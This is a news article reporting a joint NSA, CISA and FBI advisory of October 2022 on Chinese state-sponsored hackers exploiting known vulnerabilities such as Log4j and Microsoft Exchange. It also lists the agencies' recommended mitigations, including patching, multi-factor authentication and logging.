Chinese state–sponsored threat actors continue to exploit known vulnerabilities to target US and allied networks and companies, according to a new advisory published on October 06, 2022, by the US National Security Agency (NSA), Cybersecurity & Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI).
Worse, they use “an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations,” reads the joint advisory.
As the hackers’ primary goals are “to steal intellectual property” and “to develop access into sensitive networks,” the three agencies found that they “continue to use virtual private networks (VPNs) to obfuscate their activities and target web–facing applications to establish initial access.”
They then use the vulnerabilities above to surreptitiously gain unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks.
The US agencies also published the top 20 common vulnerabilities and exposures (CVEs) exploited by Chinese state–sponsored actors since 2020. Remote code execution (RCE) on Apache Log4j (CVE–2021–44228), Microsoft Exchange (CVE–2021–26855) and Atlassian (CVE–2022–26134) are among these, as well as arbitrary file upload in VMWare vCenter Server (CVE–2021–22005).
The NSA, CISA and FBI further gave a list of recommendations for mitigating the risks:
- Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this Cybersecurity Advisory (CSA) and other known exploited vulnerabilities
- Utilize phishing–resistant multi–factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised
- Block obsolete or unused protocols at the network edge
- Upgrade or replace end–of–life devices
- Move toward the Zero Trust security model
- Enable robust logging of internet–facing systems and monitor the logs for anomalous activity
